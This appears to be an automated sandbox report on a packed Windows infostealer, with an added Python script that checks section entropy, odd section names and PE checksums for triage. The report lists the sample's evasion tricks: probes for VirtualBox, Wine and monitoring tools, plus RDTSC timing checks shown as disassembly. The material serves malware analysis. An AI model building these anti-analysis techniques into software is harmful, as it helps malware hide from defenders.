Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.5:49711 version: TLS 1.2

System Summary

Source: FjFeChttqA.exe | Static PE information: section name: "" (empty name)
Source: FjFeChttqA.exe | Static PE information: section name: .rsrc
Source: FjFeChttqA.exe | Static PE information: section name: .idata
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Code function: 0_3_018BFB75
Source: FjFeChttqA.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: FjFeChttqA.exe | Static PE information: Section "" (empty name): ZLIB complexity 0.9973779965753424
Source: FjFeChttqA.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: FjFeChttqA.exe, 00000000.00000003.2107114899.0000000006059000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2107438151.000000000603E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: FjFeChttqA.exe | Virustotal: Detection: 67%
Source: FjFeChttqA.exe | ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\FjFeChttqA.exe | File read: C:\Users\user\Desktop\FjFeChttqA.exe
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Section loaded: ondemandconnroutehelper.dll
Source: FjFeChttqA.exe | Static file information: File size 2953728 > 1048576
Source: FjFeChttqA.exe | Static PE information: Raw size of ratrotcd is bigger than: 0x100000 < 0x2a9200

Data Obfuscation

Source: C:\Users\user\Desktop\FjFeChttqA.exe | Unpacked PE file: 0.2.FjFeChttqA.exe.fa0000.0.unpack :EW;.rsrc :W;.idata :W;ratrotcd:EW;lzuhqlsd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;ratrotcd:EW;lzuhqlsd:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: FjFeChttqA.exe | Static PE information: real checksum: 0x2d31ef should be: 0x2d2409
Source: FjFeChttqA.exe | Static PE information: section name: "" (empty name)
Source: FjFeChttqA.exe | Static PE information: section name: .rsrc
Source: FjFeChttqA.exe | Static PE information: section name: .idata
Source: FjFeChttqA.exe | Static PE information: section name: ratrotcd
Source: FjFeChttqA.exe | Static PE information: section name: lzuhqlsd
Source: FjFeChttqA.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Code function: 0_3_01943990 push esi; iretd 0_3_01943991
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Code function: 0_3_01926557 push ebp; iretd 0_3_01926558
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Code function: 0_3_0192765B push es; ret 0_3_019277AA
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Code function: 0_3_0192B007 push eax; ret 0_3_0192B169
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Code function: 0_3_01925D76 push esp; retf 0_3_01925D78
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Code function: 0_3_0192B6FF push ds; ret 0_3_0192B7BA
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Code function: 0_3_0192AEFD push eax; ret 0_3_0192B169
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Code function: 0_3_018C3980 push esp; iretd 0_3_018C3981
Source: FjFeChttqA.exe | Static PE information: section name: "" (empty name) entropy: 7.980628422807776
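The Data Obfuscation findings above are the standard packer heuristics: an empty section name next to random ones (ratrotcd, lzuhqlsd), a .taggant section holding the entry point, a section entropy of 7.98, a raw section larger than 1 MiB and a header checksum that does not match. The script below reproduces those checks so they can be run against any PE section dump during triage. It is an added example written for this page, not Joe Sandbox code and not code taken from the sample; it runs on constructed byte buffers, and the entropy threshold of 7.0 bits and the 1 MiB raw-size limit are assumptions chosen to match what the report flagged.

```python
"""Packer/obfuscation heuristics of the kind the report applies to the PE sections
of FjFeChttqA.exe. Added example, not Joe Sandbox code; it never touches the sample
and runs on constructed buffers. Thresholds (7.0 bits, 1 MiB) are assumptions."""
import math
import struct

# Names a normal linker emits. Anything else (an empty name, "ratrotcd",
# "lzuhqlsd", ".taggant") is a packer/protector hint, not proof of malice.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                     ".reloc", ".pdata", ".bss", ".tls", ".CRT", ".xdata"}
ENTROPY_THRESHOLD = 7.0      # assumed; the report flagged 7.98 on the empty-named section
RAW_SIZE_LIMIT = 0x100000    # the report flagged a raw size of 0x2a9200 > 0x100000


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant buffer, 8.0 for uniform bytes.
    Compressed or encrypted code sits close to 8; plain x86 code is usually 5 to 6.5."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def section_indicators(name: str, data: bytes) -> list:
    """Indicator strings one section triggers; an empty list means nothing looked odd."""
    hits = []
    clean = name.rstrip("\x00")
    if not clean:
        hits.append("empty section name")
    elif clean not in STANDARD_SECTIONS:
        hits.append(f"non-standard section name {clean!r}")
    ent = shannon_entropy(data)
    if ent > ENTROPY_THRESHOLD:
        hits.append(f"high entropy {ent:.2f}")
    if len(data) > RAW_SIZE_LIMIT:
        hits.append(f"raw size 0x{len(data):x} > 0x{RAW_SIZE_LIMIT:x}")
    return hits


def pe_checksum(image: bytes, checksum_offset: int) -> int:
    """CheckSum as the Windows loader computes it (the algorithm pefile and ReactOS use):
    dword sum with end-around carry that skips the CheckSum field itself, folded to
    16 bits, plus the file length. checksum_offset is the file offset of
    OptionalHeader.CheckSum (e_lfanew + 0x58 for PE32 and PE32+); it is assumed
    dword-aligned, which holds for every real linker output."""
    padded = image + b"\x00" * (-len(image) % 4)   # trailing bytes are summed zero-padded
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(image)


def checksum_mismatch(image: bytes, checksum_offset: int) -> bool:
    """True when a non-zero stored CheckSum disagrees with the recomputed one.
    A zero field only means the linker never set it, which is common and not suspicious."""
    stored = struct.unpack_from("<I", image, checksum_offset)[0]
    return stored != 0 and stored != pe_checksum(image, checksum_offset)


if __name__ == "__main__":
    import random
    rng = random.Random(1)
    packed = bytes(rng.getrandbits(8) for _ in range(4096))   # constructed stand-in for packed data
    print("ratrotcd:", section_indicators("ratrotcd", packed))
    print(".text   :", section_indicators(".text", b"\x55\x8b\xec" * 1365))
    tiny = b"\x00\x00\x00\x00\x02\x00\x01\x00"                # constructed 8-byte "image", CheckSum at 0
    print("checksum:", hex(pe_checksum(tiny, 0)))
```

The entropy test is the one that matters for a stealer like this: plain code never approaches 8 bits per byte, so a 7.98 section is compressed or encrypted payload that a static scanner cannot read, and the unpacking the report observed (section rights changing from ER to EW) is the runtime step that turns it back into code. A checksum mismatch on its own is weak evidence, since many legitimate tools rewrite headers without fixing it, but combined with the section-name and entropy hits it rounds out the packer picture.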

Boot Survival

Source: C:\Users\user\Desktop\FjFeChttqA.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\FjFeChttqA.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\FjFeChttqA.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1160754 second address: 116075A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 116075A second address: 1160762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1160762 second address: 1160788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5D692C6EEEh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D692C6EEFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11717EE second address: 117181F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5D68C8C008h 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F5D68C8BFFEh 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jng 00007F5D68C8BFF6h 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 117181F second address: 1171827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1171D65 second address: 1171D6F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5D68C8BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1171D6F second address: 1171D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D692C6EEDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1174FC6 second address: 1175040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007F5D68C8BFFAh 0x0000000e push eax 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F5D68C8BFF8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D2321h], eax 0x00000033 mov di, F893h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007F5D68C8BFF8h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 00000018h 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 mov dl, 38h 0x00000055 push 0FF15F2Bh 0x0000005a push eax 0x0000005b push edx 0x0000005c push ecx 0x0000005d jmp 00007F5D68C8BFFFh 0x00000062 pop ecx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1175040 second address: 11750DC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5D692C6EE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 0FF15FABh 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F5D692C6EE8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b cld 0x0000002c push 00000003h 0x0000002e call 00007F5D692C6EF0h 0x00000033 pushad 0x00000034 sub dword ptr [ebp+122D1D2Eh], edx 0x0000003a call 00007F5D692C6EEEh 0x0000003f pop edi 0x00000040 popad 0x00000041 pop ecx 0x00000042 or dword ptr [ebp+122D2F3Dh], ebx 0x00000048 push 00000000h 0x0000004a mov dword ptr [ebp+122D354Bh], edi 0x00000050 call 00007F5D692C6EEEh 0x00000055 add dword ptr [ebp+122D31CDh], edx 0x0000005b pop ecx 0x0000005c push 00000003h 0x0000005e mov cx, bx 0x00000061 sbb edi, 3081CC4Ch 0x00000067 push B2C4D33Ch 0x0000006c push eax 0x0000006d push edx 0x0000006e je 00007F5D692C6EE8h 0x00000074 pushad 0x00000075 popad 0x00000076 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11751E7 second address: 1175261 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C005h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 59B14E28h 0x00000010 mov ecx, dword ptr [ebp+122D2D22h] 0x00000016 push 00000003h 0x00000018 or edx, dword ptr [ebp+122D2DC6h] 0x0000001e push 00000000h 0x00000020 sub ecx, 20489BD2h 0x00000026 push 00000003h 0x00000028 mov edi, 4DDF7B56h 0x0000002d push F3109140h 0x00000032 jmp 00007F5D68C8C002h 0x00000037 xor dword ptr [esp], 33109140h 0x0000003e mov cx, si 0x00000041 lea ebx, dword ptr [ebp+12450DB3h] 0x00000047 pushad 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b mov dword ptr [ebp+122D338Eh], ebx 0x00000051 popad 0x00000052 and di, D27Eh 0x00000057 popad 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11752DE second address: 117534E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5D692C6EFAh 0x00000008 jmp 00007F5D692C6EF4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F5D692C6EE8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e jmp 00007F5D692C6EF1h 0x00000033 mov edi, 6A2EE3B2h 0x00000038 push 87DC838Ah 0x0000003d push ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F5D692C6EF2h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 117534E second address: 11753A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 add dword ptr [esp], 78237CF6h 0x0000000e movzx ecx, si 0x00000011 push 00000003h 0x00000013 mov si, cx 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D1CD7h] 0x0000001e push 00000003h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F5D68C8BFF8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a js 00007F5D68C8BFF8h 0x00000040 mov ecx, edx 0x00000042 push DF052E33h 0x00000047 push eax 0x00000048 push edx 0x00000049 jbe 00007F5D68C8BFF8h 0x0000004f push esi 0x00000050 pop esi 0x00000051 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11753A1 second address: 11753B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5D692C6EF0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1195DA9 second address: 1195DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F5D68C8BFF6h 0x0000000c jne 00007F5D68C8BFF6h 0x00000012 popad 0x00000013 pop eax 0x00000014 pushad 0x00000015 pushad 0x00000016 jnp 00007F5D68C8BFF6h 0x0000001c pushad 0x0000001d popad 0x0000001e js 00007F5D68C8BFF6h 0x00000024 popad 0x00000025 jmp 00007F5D68C8C000h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1193B93 second address: 1193BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F5D692C6EF9h 0x0000000c jno 00007F5D692C6EF9h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 jg 00007F5D692C6EE6h 0x0000001c pushad 0x0000001d popad 0x0000001e pop edi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1193BDC second address: 1193BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194336 second address: 119434C instructions: 0x00000000 rdtsc 0x00000002 js 00007F5D692C6EE6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F5D692C6EE6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 119434C second address: 1194350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194350 second address: 1194356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194356 second address: 1194365 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D68C8BFFBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194365 second address: 1194369 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194369 second address: 1194394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5D68C8BFFAh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5D68C8C003h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194394 second address: 11943A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EEBh 0x00000007 jl 00007F5D692C6EE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11944FC second address: 1194500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194880 second address: 1194899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F5D692C6EEBh 0x0000000c jc 00007F5D692C6EE6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194899 second address: 11948B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5D68C8C006h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 11949F9 second address: 1194A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194A03 second address: 1194A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push edi 0x00000007 jmp 00007F5D68C8C008h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194A26 second address: 1194A2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194B72 second address: 1194B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194B78 second address: 1194B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194B7C second address: 1194B86 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5D68C8BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194CF4 second address: 1194CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194CF8 second address: 1194D2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C004h 0x00000007 jmp 00007F5D68C8BFFAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5D68C8BFFEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1194D2A second address: 1194D36 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 118A457 second address: 118A45C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 116A951 second address: 116A955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 119557A second address: 119557E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 119557E second address: 1195584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FjFeChttqA.exe | RDTSC instruction interceptor: First address: 1195584 second address: 119558D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
